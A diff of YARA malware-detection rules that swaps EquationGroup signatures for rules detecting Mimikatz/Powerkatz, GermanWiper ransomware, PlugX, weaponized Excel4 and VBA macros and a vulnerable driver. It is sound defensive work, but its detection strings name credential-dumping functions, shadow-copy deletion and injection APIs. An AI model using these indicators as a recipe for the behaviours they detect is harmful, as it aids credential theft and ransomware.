-		logic_hash = "20df7ef04154e317ee844545e541d62b3b8db4ac4800ba45a26b1092499c6e69"
+		logic_hash = "19524e6ec3b0d49ff9c85ce361ef1922b92e4f7876ddb7d6c9b209b5357080e3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dfd5768a4825d1c7329c2e262fde27e2b3d9c810653585b058fcf9efa9815964"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
+		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
+		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
+		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
+		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s8 = ".?AVFeFinallySuccess@@" fullword ascii
-		$s3 = "\\system32\\win32k.sys" wide
+		$op0 = { 8D 41 05 32 06 48 FF C6 88 81 E0 80 69 00 }
+		$op1 = { 48FFC14883F94975E9 }
+		$op2 = { C7 05 9B 7D 29 00 1D 00 00 00 C7 05 2D 7B 29 00 65 74 68 30 C6 05 2A 7B 29 00 00 E8 }
+		$op3 = { BF FF FF FF FF E8 96 9D 0A 00 90 90 90 90 90 90 90 90 90 90 89 F0}
+		$op4 = { 88D380C305329AC1D60C08889A60A10F084283FA0876E9 }
+		$op5 = { 8B 8D 50 DF FF FF B8 09 00 00 00 89 44 24 04 89 0C 24 E8 DD E5 02 00 }
+		$op6 = { 8D 5A 05 32 9A 60 26 0C 08 88 9A 20 F4 0E 08 42 83 FA 48 76 EB }
+		$op7 = { 8D 4A 05 32 8A 25 26 0C 08 88 8A 20 F4 0E 08 42 83 FA 08 76 EB}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_5 : FILE
+rule SIGNATURE_BASE_SUSP_Microsoft_7Z_SFX_Combo : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_dll"
+		description = "Detects a suspicious file that has a Microsoft copyright and is a 7z SFX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a67655eb-5593-5ac7-a6aa-81f235fa3c33"
-		date = "2017-01-13"
+		id = "9163a689-c3ee-59b1-bf58-aef5d3072be6"
+		date = "2018-09-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1412-L1428"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sfx_with_microsoft_copyright.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "834a7175a23c30301fce01482a2768d453368c7ca5c72ae52b2d266b31005991"
-		score = 75
+		logic_hash = "f48887e0c1031d180e25f2d1b9e016d434f594aef283ab3af8418e86496d2eac"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ebfc1f6ec6a0e68e47e5b231331470a4483184cf715a578191b91ba7c32094d"
+		hash1 = "cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = "itanium" fullword wide
-		$s6 = "Copyright (C) Microsoft" fullword wide
+		$s1 = "7ZSfx%03x.cmd" fullword wide
+		$s2 = "7z SFX: error" fullword ascii
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll : FILE
+rule SIGNATURE_BASE_SUSP_Microsoft_RAR_SFX_Combo : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_flav_dll"
+		description = "Detects a suspicious file that has a Microsoft copyright and is a RAR SFX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4bc4804b-c6d2-5c94-b451-24bb0f3dba43"
-		date = "2017-01-13"
+		id = "0fa81a9e-2f41-5783-9786-bb6d33b82bd9"
+		date = "2018-09-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1430-L1447"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sfx_with_microsoft_copyright.yar#L27-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "579539961e29c4da60dc632b1afd348e0d799e266f175a3bae7206b615d90f5b"
-		score = 75
+		logic_hash = "a0f29fcf86139a6f95b4ab0095154bd26b555f1576b5a2e263c1939bc30e3431"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27972d636b05a794d17cb3203d537bcf7c379fafd1802792e7fb8e72f130a0c4"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s4 = "itanium" fullword wide
-		$s5 = "RHTTP/1.0" fullword wide
-		$s8 = "Copyright (C) Microsoft" fullword wide
+		$s1 = "winrarsfxmappingfile.tmp" fullword wide
+		$s2 = "WinRAR self-extracting archive" fullword wide
+		$s3 = "WINRAR.SFX" fullword
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
 }
-rule SIGNATURE_BASE_Equationgroup_LSADUMP_Lp : FILE
+rule SIGNATURE_BASE_SUSP_VULN_DRV_PROCEXP152_May23 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file LSADUMP_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8068ca41-6365-5c97-82f2-be9ad89628e0"
-		date = "2017-01-13"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1449-L1462"
+		description = "Detects vulnerable process explorer driver (original file name: PROCEXP152.SYS), often used by attackers to elevate privileges (false positives are possible in cases in which old versions of process explorer are still present on the system)"
+		author = "Florian Roth"
+		id = "748eb390-f320-5045-bed2-24ae70471f43"
+		date = "2023-05-05"
+		modified = "2023-07-28"
+		reference = "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor_inverse_matches.yar#L502-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f67a64ae7fece949d37367d85a28a879e90844e5cc56e88a85a1cce890990f55"
-		score = 75
+		logic_hash = "d988bba837b91b2ad7f69be8765a948848bce21e2daa53af602f714758cda4d4"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+		hash1 = "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc"
 
 	strings:
-		$x1 = "LSADUMP - - ERROR - - Injected" fullword wide
+		$a1 = "\\ProcExpDriver.pdb" ascii
+		$a2 = "\\Device\\PROCEXP152" wide fullword
+		$a3 = "procexp.Sys" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Mstcp32 : FILE
+rule SIGNATURE_BASE_MAL_Sharpshooter_Excel4 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file mstcp32.sys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bed26a7b-933f-5578-b65c-65179959050d"
-		date = "2017-01-13"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1464-L1485"
+		description = "Detects Excel documents weaponized with Sharpshooter"
+		author = "John Lambert, Florian Roth"
+		id = "a79e3afe-e8f9-5e56-a131-bb1b346df471"
+		date = "2020-03-27"
+		modified = "2023-12-05"
+		reference = "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_Excel4Macro_Sharpshooter.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aff97f8360a0c24bfde6a1b2616749d6cad3b19993716231d32b8bb59579c638"
-		score = 75
+		hash = "ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d"
+		logic_hash = "4aec8bb7ec8ce7ebd8228416133ea7eec995864aeec78c11548387d832b5fa65"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
 
 	strings:
-		$s1 = "mstcp32.sys" fullword wide
-		$s2 = "p32.sys" fullword ascii
-		$s3 = "\\Registry\\User\\CurrentUser\\" wide
-		$s4 = "\\DosDevices\\%ws" wide
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "sys\\mstcp32.dbg" fullword ascii
-		$s7 = "%ws%03d%ws%wZ" fullword wide
-		$s8 = "TCP/IP driver" fullword wide
-		$s9 = "\\Device\\%ws" wide
+		$header_docf = { D0 CF 11 E0 }
+		$s1 = "Excel 4.0 Macros"
+		$f1 = "CreateThread" ascii fullword
+		$f2 = "WriteProcessMemory" ascii fullword
+		$f3 = "Kernel32" ascii fullword
+		$concat = { 00 41 6f 00 08 1e ?? 00 41 6f 00 08 1e ?? 00 41 6f 00 08}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of them ) or ( all of them )
+		filesize < 1000KB and $header_docf at 0 and #concat > 10 and $s1 and 2 of ( $f* )
 }
-rule SIGNATURE_BASE_Equationgroup_Nethide_Lp : FILE
+rule SIGNATURE_BASE_SUSP_Excel4Macro_Autoopen : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file nethide_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "39e96239-2189-5993-90ba-27e47f7bfdea"
-		date = "2017-01-13"
+		description = "Detects Excel4 macro use with auto open / close"
+		author = "John Lambert @JohnLaTwC"
+		id = "cfed97fe-b330-5528-8402-08c6ba6af04a"
+		date = "2020-03-26"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1487-L1504"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_Excel4Macro_Sharpshooter.yar#L27-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70e96a8ef5f75e05b3f6d32b9b8392316c3a70cb479549a3700134435b690473"
-		score = 75
+		hash = "2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
+		logic_hash = "074aab8e1d3b66e34e8e8d8e8489e1dfee1091df0424b22cd1bfd3cf904754e1"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
 
 	strings:
-		$x1 = "Error: Attempt to hide all TCP connections (any:any)." fullword wide
-		$x2 = "privilegeRunInKernelMode failed" fullword wide
-		$x3 = "Failed to unhide requested connection" fullword wide
-		$x4 = "Nethide running in USER_MODE" fullword wide
-		$x5 = "Not enough slots for all of the list.  Some entries may have not been hidden." fullword wide
+		$header_docf = { D0 CF 11 E0 }
+		$s1 = "Excel" fullword
+		$Auto_Open = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
+		$Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
+		$Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
+		$Auto_Close1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+		filesize < 3000KB and $header_docf at 0 and $s1 and any of ( $Auto_* )
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Dll_X64 : FILE
+rule SIGNATURE_BASE_Powerkatz_DLL_Generic : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_dll_x64"
+		description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f05dd0b6-106c-5d1d-ba09-4ac3035e7030"
-		date = "2017-01-13"
+		id = "7464f8a1-9f45-580b-8a97-a57071092e3c"
+		date = "2016-02-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1506-L1521"
+		reference = "PowerKatz Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powerkatz.yar#L9-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9c874581567909055deeae4f992bd99c1e08d5f62655d1cc9a7316beb8513d8f"
-		score = 75
+		logic_hash = "979cdb42b54a26960b3173d5ea6abcc5fa61bef57f98b09e55eb4c75f1040a40"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
+		super_rule = 1
+		hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
+		hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
+		hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
 
 	strings:
-		$s1 = "wship.dll" fullword wide
-		$s2 = "   IP:      " fullword ascii
-		$s3 = "\\\\.\\%hs" fullword ascii
+		$s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
+		$s2 = "%*s  pPublicKey         : " fullword wide
+		$s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
+		$s5 = "\\*.kirbi" wide
+		$c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
+		$c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Exe : FILE
+rule SIGNATURE_BASE_Gen_Macro_Shellexecute_Action : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb93a798-4e7e-52dc-a39b-bfb63a58d250"
-		date = "2017-01-13"
+		description = "VBA macro technique to call ShellExecute to launch payload"
+		author = "John Lambert @JohnLaTwC"
+		id = "4ae3d3d9-de4a-5c5c-9a4a-bedc80b576be"
+		date = "2019-01-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1523-L1541"
+		reference = "https://twitter.com/ItsReallyNick/status/1091170625698316288"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_ShellExecute_action.yar#L1-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "975d327d5922e4b179a677501c2613186ea85299958a996dcdeb503b02495ff7"
+		logic_hash = "da40175579f7d76d10ad0188851f111ba5d875ce990b2940166dd28eac2a742d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33ba9f103186b6e52d8d69499512e7fbac9096e7c5278838127488acc3b669a9"
+		note = "This rule only works on VT or systems that perform macro subfile extraction"
+		hash1 = "0878eec9ecae493659e42c1d87588573c1e6fc30acf7a59e6fdb5296b1c198ef"
+		hash2 = "a0963ac15339c9803b4355fd71b68bf6ddedad960d5b3ad40bae873263470191"
+		hash3 = "dd094e44a817604596d1ab06ca6e9597d49ca0a2cbe9239c73ceaad70265ec2a"
+		hash4 = "7b9094ea41e89379c7048ef784ef494c4597ea0d31b707dcb9c8495f241f5fb0"
+		hash5 = "35d8242726b905882bbfcf2770f84cb6f40552e76bff8fb0082ca10de3d61e54"
+		hash6 = "bf9ff20d814bf21d46a22abbd7a8ad0276145807f9adf8d2787df9e3fce3f35d"
+		hash7 = "77966004fcbff147f6923b3405ad9ad4e1dda42d0931564d0cdc4c7e1c91106a"
+		hash8 = "c77c8033a1e5f694fa119dd7f78811f6015726822121b9414fc01e7de8770447"
 
 	strings:
-		$s1 = "Extended Memory Runtime Process" fullword wide
-		$s2 = "memess.exe" fullword wide
-		$s3 = "\\\\.\\%hs" fullword ascii
-		$s4 = ".?AVOpenSocket@@" fullword ascii
-		$s5 = "Corporation. All rights reserved." fullword wide
-		$s6 = "itanium" fullword wide
+		$com1a = "00A0C91F3880"
+		$com1b = "C08AFD90"
+		$com2a = "00A0C90A8F39"
+		$com2b = "9BA05972"
+		$s3 = "ShellExecute" fullword
+		$s4 = "GetObject" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		filesize < 1MB and ( uint32be( 0 ) == 0x41747472 or uint32be( 0 ) == 0x61747472 or uint32be( 0 ) == 0x41545452 ) and all of ( $s* ) and ( all of ( $com1* ) or all of ( $com2* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Processinfo_Implant : FILE
+rule SIGNATURE_BASE_MAL_Ransomware_Germanwiper : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file processinfo_Implant.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b110d819-2298-507b-91bb-2787bb11322e"
-		date = "2017-01-13"
+		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "e7587691-f69a-53e7-bab2-875179fbfa19"
+		date = "2019-08-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1543-L1558"
+		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_germanwiper.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0aace3c6fa20c5bb238264b2aa484d548945a4c2ccb65482cce71427f061604"
+		logic_hash = "dcb4f91006a893149a60e9708efb9de809f75c810bddfd2d90c8f6fffa0879ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aadfa0b1aec4456b10e4fb82f5cfa918dbf4e87d19a02bcc576ac499dda0fb68"
+		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
+		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
 
 	strings:
-		$s1 = "hZwOpenProcessToken" fullword ascii
-		$s2 = "hNtQueryInformationProcess" fullword ascii
-		$s3 = "No mapping" fullword wide
+		$x_Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" ascii
+		$x_Mutex2 = "cFgxTERNWEVhM2V" ascii
+		$PurgeCode = { 6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ??
+                     50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8 }
+		$ProcessKill1 = "sqbcoreservice.exe" ascii
+		$ProcessKill2 = "isqlplussvc.exe" ascii
+		$KillShadowCopies = "vssadmin.exe delete shadows" ascii
+		$Domain1 = "cdnjs.cloudflare.com" ascii
+		$Domain2 = "expandingdelegation.top" ascii
+		$RansomNote = "Entschluesselungs_Anleitung.html" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		uint16( 0 ) == 0x5A4D and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_2 : FILE
+rule SIGNATURE_BASE_Korplug_FAST : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PortMap_Implant.dll"
-		author = "Auto Generated"
-		id = "662ee1cf-b837-5362-84a8-1af7335d5e1b"
-		date = "2017-01-13"
+		description = "Rule to detect Korplug/PlugX FAST variant"
+		author = "Florian Roth (Nextron Systems)"
+		id = "85c6c460-2902-5bfa-be58-a2b62e3b882e"
+		date = "2015-08-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1560-L1574"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_korplug_fast.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fcbc518d23dc21d482abcac29505c5404fc9e309554ca7dc9f1014adbff83e1a"
+		hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
+		logic_hash = "31aeb634eecc0f93353432b0dde113bfb54810ea74b02f959447a1d42e7e9e1b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "964762416840738b1235ed4ae479a4b117b8cdcc762a6737e83bc2062c0cf236"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
-		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
-		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
+		$x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
+		$a1 = "ShadowPlay" fullword ascii
+		$s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
+		$s2 = "nvdisps.dll" fullword ascii
+		$s3 = "%snvdisps.dll" fullword ascii
+		$s4 = "\\winhlp32.exe" ascii
+		$s5 = "nvdisps_user.dat" fullword ascii
+		$s6 = "%snvdisps_user.dat" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $x1 or ( $a1 and 1 of ( $s* ) ) or 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Ntevt : FILE
+rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ntevt.sys"
+		description = "Auto-generated rule - file HRDG022184_certclint.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36d23adb-dafe-5e99-8976-b146ceca2f9b"
-		date = "2017-01-13"
+		id = "7239a5f3-9c29-57d7-be95-946d14039353"
+		date = "2016-12-29"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1577-L1591"
+		reference = "https://goo.gl/WVflzO"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5259c89dfedc34ca032775bda4ead04985da6b3d042b8a6635f5f848570d8c6"
+		logic_hash = "d4a06fbf875ba2dbe64abcc21fab4eea1fe1b092498a09d9a310214562c1869e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "45e5e1ea3456d7852f5c610c7f4447776b9f15b56df7e3a53d57996123e0cebf"
+		hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
 
 	strings:
-		$s1 = "ntevt.sys" fullword ascii
-		$s2 = "c:\\ntevt.pdb" fullword ascii
+		$s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
+		$s2 = "Repeat last find command)Replace specific text with different text" fullword wide
+		$s3 = "l\\Processor(0)\\% Processor Time" fullword wide
+		$s6 = "Self Process" fullword wide
+		$s7 = "Default Process" fullword wide
+		$s8 = "Star Polk.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Nethide_Implant : FILE
+rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file nethide_Implant.dll"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36559b69-1718-5d9b-8d6f-3db4becba0c4"
-		date = "2017-01-13"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1593-L1608"
+		id = "37cfba67-af85-5efe-9b07-9f1e5d9f9195"
+		date = "2016-12-29"
+		modified = "2023-12-05"
